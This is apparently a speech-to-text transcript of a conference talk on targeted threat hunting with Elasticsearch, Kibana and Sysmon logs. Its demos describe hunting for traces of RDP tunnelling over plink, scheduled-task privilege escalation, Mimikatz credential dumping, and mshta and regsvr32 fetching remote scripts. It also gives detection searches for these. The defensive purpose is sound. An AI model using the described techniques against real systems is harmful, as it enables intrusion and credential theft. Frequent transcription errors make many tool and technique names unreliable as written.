Brandon George - Hunt Like You Mean It

good afternoon besides columbus my name is brandon george this talk is called hunt like you mean it uh just a quick note about myself uh currently i am a senior analyst at buy air defenses sock and i am currently developing and maintaining two projects fourth or hunting one of which is curtailed to quick and easy deployments of the elastic stack for throwhunting and the other is a fork of olive heart tongue's cismod modular project so topics we're going to go over today we're going to go over what targeted for hunting is why we do threat hunts and how we do threat hunts so i want to go over just the working definition we're going to use today

this is pretty much what you'll see across the board but it is proactively searching for threats or signs of compromise within an environment so let's go over targeted through hunting target through hunting was an idea that i found to be the most effective in getting small organizations and small deployments for threat hunting up and going it is a wrist wrist-based approach to data retention um one of the many issues that uh i found in trying to talk about through hunting was just the sheer volume of data people thought they needed to get started with her hunting for hunting doesn't need to be a massive deployment it can start with a department a few users a few hosts but you want to you want to

deploy it based on risk so what i mean is you want to hunt for users um that interact with the outside world a lot users like hr who are going to be receiving resumes who are going to be interacting with people to get them started on their jobs you want to talk to and hunt for accounting they receive a lot of expense reports they're going to be talking with vendors for costs these are the types of users you're going to want to hunt for because we want to protect those users we want to make sure that they can continue to do their job and that if and ever the case they do open a malicious document

is not their fault is just them doing their job we can you know we still continue to train them we still continue to do everything we can for them but if our defenses cannot withstand a maldock that speaks more lowly of us than it does of them and so targeted throw hunting helps in to aid in those defenses because if we just focus on our critical assets we're already going to catch it way late in the game and so we want to be able to focus and start at the end point to catch it early and hopefully see it before our edr does so let's talk about this a little bit more it reduces the amount of logs

we're going to ingest by sheer volume but it's going to increase in diversity because we're going to take it from multiple different sources it's easier to manage for small to medium organizations because you're focused on maybe specific departments comprised of only a few people rather than large organizations which you could do the same thing but your departments are going to be larger and you may not want to focus so much on premise as maybe you would consider doing so in a small to medium organization it's really going to come down to whatever is going to be the most cost effective and easiest to manage because when it comes to this you gotta not only organize the operational side

of it but you gotta be able to uh maintain and equip the hunters who are gonna be in your platforms so why do we hunt i think the definition itself gives a pretty good reason about why it's a hunt you're proactively searching for threats and anomalies and i want to kind of harp on anomalies because it is easier to hunt for anomalies than it is for threats and so with all that in mind it equips us to do a couple of other things as well it allows us to get familiar with our environments and to notice anomalies as they happen or in a very short period of time it equips us in such a way that when we do

these deployments we can get a feel for what is normal for these hosts and when something deviates from that normal behavior we can kind of catch it and investigate the last and i think most important thing that throwhand enables us to do and why we ought to be doing it is that we can detect what we're not detecting we can write rules and searches that maybe our edr or our sim are just you know not designed or equipped to do at this point in time and we once we notice that oh okay you know we actually have evidence that something is happening we can incorporate those detections into our sim into our edr platforms and then go forward not just to

you know embed your organization but to also um maybe make your vendor better you know that way you both have something to benefit from whatever you're seeing and making use of those logs for so let's talk about types of hunts tyler hudak not too long ago recently wrote a blog for trusted tech talking about what types of threat hunts you're going to be doing typically there's only going to be two there's a targeted throwhunt and there's going to be a general threat hunt the target of throne hunt is when you know you have ants in your house you know there is maybe some kind of bec or you have ransomware or really any type of malware or actor in your

environment and you can specifically narrow it down to at least one specific detail that you can hunt for and if you maybe you say you know it's a threat actor maybe you know it's uh you know you have emotion in your environment or you know god forbid you had ta 505 in your environment you know what's going to kind of follow and you can threat and you can thread hunt based on those details based on previous reports or what researchers are posting about these kind of things are huntable they're focused on one thread actor one piece of malware and you can go from there a general threat hunt may be focused on one or two aspects that may be seen

across multiple threat actors or maybe in particular something that is of value to you from a pen test or from a previous compromise that say you know why didn't we detect this so you can do a threat hunt and say i want to see evidence of malicious powershell in my environment i you know malicious being i want to see encoded and compressed commands um i want to see use of encoded command as a switch in you know the command line i want to see multiple network connections via powershell things like that very general they're not specific to any one thread actor or type of malware so let's talk about how we hunt it starts with knowing your resources

before you ever develop a budget see if you can recommission an old server if you're a relatively small organization this may not be something that you have available to you but you know in a medium to large size organization that you know that just may be something you can save your budget with see it you know see if it's high in ram and high in storage because these applications are mainly going to focus on those two you want to make sure that you have enough network capacity to not create so much ingestion that this has become more of a problem than a solution and when we talk about storage see if you can set up

and do the math to set up three to six months of log retention that is not always feasible and i'm aware of that three to six months is a gold standard that a lot of people can't really aspire to but if you can get one to three months that is a great start because one to three months of dedicated storage of just logs that from hosts that you are interested in can be enough to do great threat hunts you know on a small but maybe valuable data set um see how many daily what size what's the size of the daily logs you want to receive from these hosts a day and kind of go from there because then

you need to focus on your analysts um are you going to be able to feed them a steady flow of resources to distinguish one from a false positive from a true positive and are and what are they going to do with gray areas what are they going to do with hosts that or with logs that they are you know unsure about are they going to have the time and available resources to study and know what to hunt for all these things you need to kind of take in consideration especially if you're working in a team environment and you are not just the lone security guy that we have developed a mythos around so let's talk about logs know your log

sources do you have departments or specific hosts that you are really interested in and want to always kind of keep an eye on maybe you have maybe you want to keep an eye on your c-suite you want to hunt for specific users um identify again identify those risky users because they're they're going to be of value to you when you were doing your third house keeping your assets in scope makes retention much easier and it opens up other opportunities later to increase what types of logs you're going to be ingesting once you know you're going to be ingesting um think about what is going to be most valuable to you is it you know you're obviously going to

have windows operational logs but are you going to deploy sysmon are you going to deploy zeke um are you interested in windows dns logs um and this should go without saying but you should be logging powershell um all of these things can you know once put together can offer you a very clear and valuable picture into um you know what a successful hunt may look like can you you know extrapolate you know you know these what seemed like disparate details to form a clear picture all right let's talk about centralized logging if you want a successful threat hunting program and you want to save an incident responder a lot of time you must centralize your logging

doing it now is much easier than how it used to be you know even five to seven years ago using shippers like nx log and when log beat are going to be the way you are going i would say the easiest way to get your logs from your endpoints to your platform now whatever that may be uh and i talked about this before but make note of how much congestion this might create if you have enough bandwidth internally this shouldn't be too bad however if you are just getting all gung-ho about it this might create some problems so let's talk about full text searching platforms uh three that i am going to try and just

talk about real quick are the three that i know of and have had experience with um elasticsearch is remarkably efficient and what elastic is doing with our products now i think is quite remarkable if you want to look at cloud storage humeo is very effective and i think is a wonderful place to do you know basic searches and hold all the logs that you're looking for it's very similar in searching to things like cubana and you can pull all sorts of fields out with humeo splunk splunk has built quite the reputation in being just the place for log searching you can do powerful metrics tracking with splunk valuable field data that you can pull out and

search for but it is always kind of calm with that hefty price tag so if it is not something you can do elasticsearch and humeo are two cost-effective measures you can do either in the cloud elastic cloud is relatively inexpensive in comparison to splunk but still something you can deploy on prem humeo is also very cost effective if you i will say this though if you have a sim or an edr that has searching capabilities do not go and try and search out a new product unless you are already considering you know getting rid of whatever you had before there are some very poor sims uh that i have seen that have really lackluster searching capabilities

maybe do a lack of documentation or it's just too clunky um if that is something you want to do as a replacement these three are ones i would encourage you to go look at so let's talk about searching for anomalies as a general rule anomalies are easier to hunt for than threats the reason being is that uh threats require that you know that they're threats when you search for anomalies you have the opportunity to see things that maybe aren't necessarily malicious but they are suspicious maybe you know prompt something like hey you know we have a pretty severe misconfiguration um with our sharepoint server you know things like that you can use metrics after you've con you

know pretty repetitiously set baselines to notice things that are kind of out of line because once you set baselines you can start catching little hanging fruit like should windward.exe be spawning a child process that's something you can see in an endpoint i mean you wouldn't necessarily see that on a server but you can set up searches to say hey is there you know any process where the parent process is one word you can set up things like that and you know have something pretty much instantaneously have you looked at ms hta recently if you don't know what mshta is mshga stands for microsoft rich html application you can write what's called hda files and they're essentially

just html pages with that you can use as a gui hp procs are using them uh amazon assistant is built with hda files even teamviewer uh if you have you know the chrome extension that uses an hta file as well all of these things are false positives but you can pretty easily identify and we'll see this later what a malicious use of mshga looks like you want to talk about lahaine fruit let's talk about users launching and using applications they don't normally use should your href be running powershell things like that can be useful to you to try and narrow down what is considered anomalous maybe your hr rep is familiar with powershell and an application they use for employee

management utilizes powershell it may run as that user but you know you can quickly identify when something is malicious and when it is not so let's talk about knowing evil because this is what threat hunting is all about you have to be able to read up on blogs read up on ir reports on what responders are seeing as well as utilize things like malware reporting feeds such as appany.run url house if you want fresh malware from researchers and what they're seeing and you complement that with virustotal you can get the useful sandboxing tools of app any as well as virustotal and maybe gather sources from url house i'll touch on threat intelligence real quick it

can be useful but is oftentimes less actionable than the sources i just mentioned before i would also recommend studying open source signatures such as sigma there are a lot of threat hunters who use sigma as the basis of just kind of documenting how they are going to form queries maybe in other platforms you know if you have a sigma rule that you wrote you can use things like encoder to convert from sigma to kql for keyboard that we'll use later i would also say look at using automated testing suites like atomic red team other projects like low bass and gtfo bins are other great sources if you use windows living off the land binaries and

scripts or little bass is a great repository by odd varbo at trusted sec that he has been building for years now it is a wonderful repository that i pretty much used from the get-go to search for to really understand what malicious uses of regis vr 32 look like malicious uses of front tll-32 all of these things you can find in that repository and more and if you're using the linux equivalent gtfo bins there is a plethora of resources you can use to hunt on linux something i would pretty much equate in the threat intelligence realm is minor attack framework it is useful if you're hunting for techniques um and if you're using something like olaf

hartong's system on modular configuration that is all tagged with minor techniques and you can search for that depending on how you know your logs are parsed you can search by technique in all of your platforms so then let's talk about knowing normal someone i want to bring your attention to and whose resources i've used to even help develop this talk is samir over at elastic he oh i think since i've found him has been talking about knowing normal how to filter out and try and increase your detections and threat hunts by just filtering out and looking at startup processes in windows that's an easy thing you can do and we'll get into that in a little bit

later as well but again this idea of baselining is fundamental to threat hunting as much as it is searching because if you are not able to filter out what is normal you're going to have a very hard time making this program effective so let's talk about building hunts there are three ways to kind of categorize how you can build hunts uh you can use automated testing platforms like atomic red team as well as build your own scripts and tests with low bass but then you're going to have to eventually get to a point where you're going to have to call on a professional so pen tests or any type of security test might be something you look into it's

expensive but it may be worthwhile it's a better way to test your detections and know what artifacts are being left behind if you can you know get in communication with your pen tester and say hey we want to do an assumed breach on our you know on our hr department you know we'll have either a dropbox or we will set you up with an account on here and you can kind of go from there again it's it's a quick and dirty way to do it and it'll often you know take a week maybe two weeks at most and something you can say hey we want to test our detections for our throat hunting team and go from

there because a lot of time you're gonna have to do this for compliance anyway so why not make use of it for your other teams now the most expensive way to really build hunts is around red team exercises i have heard in the past of red teamers getting caught by threat hunting teams because they're consistently looking for things that they know their edr and sim platforms are simply just not catching you know because correlation rules would be too complex or um maybe they don't have the kind of rapport with their edr vendor to say hey we want to detect this and you know maybe they're just not willing to do it at that point in time

so having a throat hunting team can help remediate both of these problems so let's talk about what we should be searching let's talk about process creations because it is the bread and butter of most threat hunts if you are not going to deploy something like uh you know cis mod in your environment enabling command line auditing with event id 4688 is the first thing i would do there's a lot you can collect without having to raise your events per second and say something like a sim um and if you want to use a sam for threat hunting again it's not going to raise your eps and you can start flagging things like suspicious process creations

suspicious service creations things like that are going to be useful to you um maybe not service creations for 46.88 but at the very least you can start filtering out known and trusted applications with event id 4688 so let's talk about uh a simple persistence mechanism that's been used for years that is run and run run once registered keys malware to this date is still using this as a persistence mechanism for system reboots uh and user logons and they can start their process they can start their process as whoever based on which registry hive it's it's attempting to be ran out of let's talk about powershell it is quickly going out of style with our favor our favorite red teamers

or pen testers because auditing aside from the powershell version two um is so much better than what it was when it first got started so however again commodity malware is still using it because it's just easier that way um you know maybe they'll hope they'll get an easy win and they won't get caught but you know you may not get so lucky with your with your local pentester let's talk about scheduled tasks and bits uh bits is a really remarkable way for malware to call back get updates and pull down new files in a way that maybe oftentimes people aren't even looking for it so it's really useful to look for signs of urls inside of bits jobs as well as

look for urls in scheduled tasks i'll show you a mechanism for privileged escalation utilize by scheduled tasks um so there's a there's almost a one-two punch here with that because you know yeah you can use it as a persistence mechanism to maybe restart a job to let's say for a crypto miner i've seen that in the past um not just for privilege escalation but also for persistence so let's also look for unusual calls of 2 volt cli you are looking at event id 7 for sysmon that is an image load you want to look for unusual images attempting to load volatility.dll lsas is going to call volatility dll but that's because that's what the local security

service is going to do if you look for any applications in say in app data roaming that's something you can look into especially if it's an untrusted application uh so let's talk about group modifications real quick before we go back to path mismatching um if you have um maybe an iem person on your team who can help you keep track of what users are and what groups maybe you can see users being added or removed from groups that you know maybe were never specified in your procedures things like that can be things you can hunt for they're not always the most fun hunts but they can be done so i want to talk about path mismatching

real quick very simple to understand you can have a list of files that you know are in c windows or in system 32 that you can set negation statements to say i want every instance i've run dll32 that is not in c windows or in c you know see windows system32 things like that are really easy ones as well because you know that in i can't even think of a good reason why that should happen but if you see that investigate it so i want to talk about gll search order hijacking it's a similar idea to path mismatching except for the fact that it is a untrusted dll uh being called by a trusted executable

if a trusted a a trusted process is attempting to load maybe some sort of dll it's going to look first in its current directory and then its parent directory and then you know and whatever whatever is its path next so if it can set up the search order if malware can set it set itself up in such a way where a trusted um a trusted application can run its code it's an easy one so uh let's talk about kerberos um there is a great blog by trustedsec that goes over how to hunt for kerber roasting if you're not familiar with kerberos steam take time after this to go look it up it's very involved and i'm not even sure i fully understand

it some days but it is something that if you use kerberos in your environment it's very easy to look for and something you can investigate because you if you use kerberos in your environment you can't stop it it's just how carperos works another one you can look for is unusual applications in app data again the reason i try and harp on app data so much is that if malware does not have high enough privileges maybe to drop itself in windows temp it's going to use app data roaming after local at that local low now let's talk about high volume dns queries something that was first taught to me when i was learning about threat hunting

is high volume dns txt record requests you can form you can form whole scripts uh just by the records that you can get back from txt records because tc records can hold more data than your usual say a or double a record so you can use that to form powershell scripts or batch scripts you know or even if you want to pull down all of the data from an executable you know split into you know different parts you can drop that on a host execute it and go from there if you want to get into the deception realm and it's not going to break compliance i would say preserve one or two uh you old user accounts maybe

with some faux security groups that you can set up searches for to say hey if this ever hits off we want to we want to be alerted you know we want to investigate immediately because that is a sign of a honey account being used and then we let's talk about processes making unusual network connections this is one of those things you can set up uh after you've baselined and set up metrics for say hey are there you know are there any processes across any of my hosts that are just hanging off more than usual i want to show you that in the dashboard for filtering and you can even curtail that towards searching for applications that

shouldn't be making a lot of network connections say like cmd or powershell you know again depending on what is happening um so we'll go from there um and let's get started uh so um what i'm gonna show you is graphs for baselining and filtering as well as just kind of setting up your own hunting dashboard for things that you can see at a glance so searches we're going to do today we're going to look at traces of rdp tunneling a couple examples of privilege escalation as well as malicious use of mshta malicious powershell as well as regest vr32 i'm not going to go over searching by matter tag image or host just large due to the fact

that once you have already seen the examples i'm going to show you you're going to be unable to do these on your own all right so the first thing i want to show you is an easy way to start filtering via search and then visualizing so i'm going to go through since i've already saved it so i'm going to go to discover i'm going to open up a search so the search i'm going to open up is processes making network connections so here is what the search is comprised of so i have an event code 3 so that is specifically for processes with network connections in sysmon and it i am just going to for the sake of the search show process

executable and event code that way in case we want to look at what the raw search data shows us we can take a look now now that i have only limited the events or in this case hits of just events with event code 3 i can save that i'll save that as processes making network connections and then what i'm going to do is i'm going to go back and i'm going to go to visualize so i have saved a visualization already but we're going to go through it together so i'm going to create a new visualization in a data table and then i'm going to click processes making network connections that way i can see there are 727 events

where there are processes making network connections however they have collected so the first thing i'm going to do is split rows so split rows i want to click on terms and then i'm going to want i want to look for that field that we looked at earlier process executable and then i want to set up for five just for this and i want to split the table and i want to do columns actually i'm going to do our rows now columns will be fine and then i'll do terms again and then i want to have the agent name so that agent name is what is assigned by winlogbeat and is kept whenever it hits elasticsearch so i'm

going to update that and here's what i have you know what i am going to keep it by rows all right so here's what we have we have century which is a with one of my hosts and then ms edge win 10. that's another one so i know that it looks like mattermost windows defender github desktop and service host hosts it looks like mattermost is the process that is making the most network connections on my host it looks like on ms edge110 it's service host so i could you know start filtering out for mountain most you know windows defender maybe zoom github desktop go to meeting and keep going that way and so as you

can see there are a number of ways i can start filtering by this and i can even do this at the search level if i go back to discover and go by this so let's just say i'm looking for and not a message that contains anything what's the matter most in the name

and it'll wipe everything out so if i save that save that and then i go back clear out these errors and then go back visualize and if i just get rid of all these so that it doesn't clog up my screen you'll notice that mattermost is nowhere to be seen so you can save these for later and i'm going to do that let's say hosts process making network connections and then i will save that and keep it for later it's just that simple okay so we are in the main menu of kibana and we've set up our stack we've ingested some logs and now we want to do some hunting so we go to discover

and the first thing we're going to search is signs of rdp tumbling generally you're going to look for signs of two things existing in the logs one of which is signs that an ssh tunnel was created generally we can see this with various executions of plink and we can also see this with rdp traffic communicating over the loopback address space so if you want something to quickly search just to get you know maybe not the most efficient query time but you can look for 127.0.0.star and 33.89 that way as long as these two entities exist in logs we can search for it so we're gonna search for the past 10 years and it looks like we have a few

hits so what i'm going to do is i'm going to hit command line in case we see an ssh channel being created and it looks like we see plink running and let's see the source ip and then this is the destination ip yep destination ip as well as destination port and source port so i'm going to move this over to near the source ip and so you can see an ssh tunnel being created and it looks like there's going to be some sort of callback and it looks like this could be a reverse connection to um let's see 10 0 to 18. and there we have it you know that's something easy you can search for

and if we wanted we could also view the surrounding documents to see or what around this time might help us figure out um you know what might have caused the initial exploitation because at this point you know they're probably already setting in for the post exploitation stage and trying to move laterally from pretty much there and out all right so we'll go from there on to our next demo we talked earlier about using scheduled tasks for persistence but i also failed to mention that scheduled tasks can also be used for privilege escalation that's what we're going to look at now so i have a search that says show me show me any logs where uh the task name

exists and i set a field uh i set a column to show me all the task names that we have in here so we'll also look at look at the event id as well so i see you have a couple of 4698 events 4702 and i'm really concerned with these 4698 events so i have four events so one of which is full powers tasks i don't know anything about that let's look at orca update orchestrator i know about that add these three okay well let's take a look here so i have the subject user who created the task looks like it is local service let's take a look at what the content says so i'm usually concerned about what it's

executing so i see exec the command is referencing public users tools token manip so i assume that's token manipulation and then it's tempting to execute full powers.exe well i don't know anything about that per se so let's look at what else we have up here so i'm going to look at the principles it tells us the local service account and i'm going to look at these required privileges real quick so i see assigned primary token privilege audit privilege change notify create global privilege impersonate privilege and working side privilege so i have a feeling this is malicious and i'm sure if i was able to get it get my hands on this executable that might prove to

do that the reason i believe that is that local service accounts generally do not have high privileges they have some privileges but by design they are meant to be restricted when you add these privileges you start enabling them to do more so if you can at least create a scheduled task as local service maybe you can start a process that will require certain privileges to enable and enable and elevate that user to do more than it was originally intended to do so i know there's some privilege escalation going on here but what about um maybe some credential dumping so i want to go over to a different index i'm going to clear out i'm just going to start fresh so i'm

going to give her my task name and i'll get rid of this because this is not in there so i'm going to look for is what we mentioned earlier so let's talk about an image load to false cli dot dll so i see this maybe i'm looking for uh vault cli is there anything that exists in the logs and there is let's take a look what process was it credentialed philippines so it looks like powershell attempted to load this now oftentimes this is a bit more plentiful depending on what's happening on the host but i want to see the process id of this so i'm going to go up here i want to filter for that value so we know that already

exists but i want to clear out the image load and just look for the process id and it looks like we have a couple of hits and these appear to be let's see what kind of event ids these are so i have an event code let's just go to the columns and see what we have it's like a 1 12 and a 7. so let's just start the one and see what we got let's go to the command line and i just like to see all these at once well it looks like yeah it looks like there was a download string from the power supply repo to invoke me me cats and dump the creds

and i have a feeling this may be an image load that we looked for earlier so let's see if we can look at what other images were loaded

so mpv client okay here we go so sam lib okay so that's for all the local creds as well as about cli looks like smart cards human interface devices and the crypt yellow all right so we already know there's been activity of privilege escalation as well as credential dumping that may potentially be used for privilege escalation in the future maybe for a user who has domain admin rights on those hosts the last three examples we're going to look at is a combined use of malicious uh execution of powershell regis vr32 and mshta.exe so what i'm attempting to look for is maybe uh child processes of powershell but first i guess we better look at maybe

just usage of mshd that you see so let's look at message and mshda let's just see if it exists anywhere in our logs and it looks like we have quite a few so we have some process creations 4688 and we have some registry edits 5158 let's see if i can remind myself what that one is so it's a filtering platform it looks like mshta made some sort of network connection okay so we have any idea where not image load okay so i say something to use a croj okay that tells us a couple of things okay so let's start looking at these command lines all right so doesn't that there's too much available to us

maybe that's not the field we need let's look at it all right yep this is just a different field we needed to use and that's much better all right so let's take a look so we see cmd attempted the lodge calc uh there were a couple of hda files put in the startup folder looks like an atomic test was ran all right so this is probably the first thing we want to look at so we look at mshda is attempting to launch just some raw javascript uh attempting to reach out to github user content red canary atomic red team t1059.001 so it looks like the downloaded sct file and then see a couple other things and

then we see yep that process creation for mshga exe and then yep execute and close there you always see powershell attempting to write host foreground color okay i wonder if the parent process was mshda yup parent process name msha so mshta was even launched in powershell back up here keep going yeah i mean we obviously say something has gone awry and we see even msh launch cmd.exe okay so that's definitely one thing we can look at so maybe we can start with the parent process because i believe if we looked it looks like parent the parent process was powershell now let's see if we can get the parent pid now i'm hoping

okay so that's the command line so let's see if we can filter for this nope not that

not that one sorry down

that's going through all the fields that i don't need parent process name okay

well it looks like we're just gonna have to start here and start and look for that and we'll just get rid of our query and start there now i don't generally recommend doing this just because you know i'm writing this in a test environment if you have you know hundreds of hosts this may take a while but it looks like we already see we already get a couple of hits we have invoke bloodhound yeah that's remote download of sharphound into memory followed by an execution of the script i would say that's definitely malicious keep going we see there's a power split attempting to be ran there's that credential dump we looked at earlier invoke bypass okay

now let's see if there's any because we said we combined this and let's see if there's anything where reg spr32 is being executed so message just start like that and it looks like we have three hits so we have again an atomic red team test where it's attempting to call an sct file that exists on the file system and then we have yeah https taking the call to a url on github as well as attempting to launch cmd it's a little hunch regis pr 32 all right so we see already that there is enough for us to work with to know that there is a uh power shell is being utilized maliciously in the system

as well as mshda and regis vr32 all right so the last thing i want to show you is the dashboards that we can make from all the accumulated safe searches that we've done so this is the hunting dashboard uh so you can see we have malicious use of regis vr32 let's see we have suspicious use of mshta we can see that log over here that we looked at earlier as well as the use of any loopback addresses as well as port 3389 we see that see that in a command line as well and just as a note this is these are not all the same logs um this is just from a simple search that we saved and anytime you see this

being used in a log you can investigate it pretty easily and see okay you know what was imported what was the image and then we can also look at this complex search we built earlier and you can look at the record of whatever's being used you can also take a look at the raw data that was acute that we have from the powershell logs now to quickly move over i'll show you the filtering dashboard now i built some of these searches in another time but as you can see i have host process and every connection so you this can be filtered to say okay you know maybe i want to add processes with network connections in my

hunting dashboard but you know maybe i can see okay i know that windows defender i can ignore that it hits 46 times maybe not such a big deal but then i can also see things like sysmon i attempted to make a network connection as well as service host and then sih client and you can see the most popular command lines which in this case is pretty clear out of out of all the hosts that i have uh reporting back on hosts with that command line is the most popular followed by none so we can probably filter that out and then the u.s notification some nvidia stuff and then so on and so forth you can also filter by most popular

events so 4673 privilege requests and then you can also see the most popular domains and you can you know filter that out as well maybe you want to ignore github.com not exactly recommended because a lot of open source security tools are utilized at github so that is the dashboards you can create so you can get all the information that you are looking for at a glance and you can start filtering from there all right so some resources that i can provide and at least show you guys for future reading tyler hudec at trustedsec he is the practice lead for incident response and does a lot of threat hunting as well uh this blog was very useful it came at a

very good time to talk about what types of threat hunts you can do and what you might need to talk about samir's evtx attacking attack samples the logs for privilege escalation rdp tunneling red svr32 uh all of that was provided from his repository by his permission and he has a lot of great slide decks and other repositories that he is updating he's very busy and always working on something the lowbass project and atomic red team are two projects i would encourage everyone to go read and study on if you want to do threat hunting or if you just want to try and grow your knowledge base for detection building uh my twitter is at the hacker 4chan

uh i am always very busy on there it's either feast or famine i'm either tweeting a lot or i'm tweeting or not tweeting at all but i want to talk about the hulk project as well as my own project elk hunt uh hulk is a extremely versatile and very creative and very useful project for threat hunting on the elk stack this project has been in development for quite a while and it has grown from very early stages and it has come a very long way um it incorporates things like playbooks uh if you've ever heard of mordor um roberto and his brother are doing a lot of great work over there and are making a wonderful project

a shameless plug for elk hunt it is and was inspired by the hulk project but i wanted to try and try and strip down as much as i could but still keep the bare bones of what makes health so useful and that is the up stack that is shipping and that is filtering and trying to make use of visualizers and trying to offer as many resources to people who want to get started with threat hunting in small environments but maybe who don't have the resources or knowledge to incorporate something like hulk hulk is turning uh into a combined detection and threat hunting platform that you know incorporates a learning mine does not i try and stick to the

philosophy of targeted threat hunting and all that it has to offer if you want to contribute or take a look please encourage i would highly encourage you to do so it is at a stable build right now and is as simple as two powershell scripts um please take a look uh thank you for your time i really appreciate it uh again my name is brian george and this is hunt like you mean it